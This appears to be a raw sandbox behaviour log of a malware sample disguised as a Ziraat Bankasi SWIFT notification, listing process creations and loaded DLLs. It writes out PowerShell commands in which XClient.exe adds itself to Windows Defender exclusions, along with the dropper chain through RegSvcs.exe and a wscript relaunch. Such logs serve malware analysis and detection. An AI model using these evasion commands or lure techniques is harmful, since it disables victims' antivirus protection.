Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\differences\niellist.exe"
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
Source: unknown	Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: unknown	Process created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
Source: unknown	Process created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Source: unknown	Process created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
Source: unknown	Process created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
Source: unknown	Process created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Process created: C:\Users\user\AppData\Local\differences\niellist.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\differences\niellist.exe "C:\Users\user\AppData\Local\differences\niellist.exe"
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\differences\niellist.exe"

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: mpr.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: mpr.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: wsock32.dll
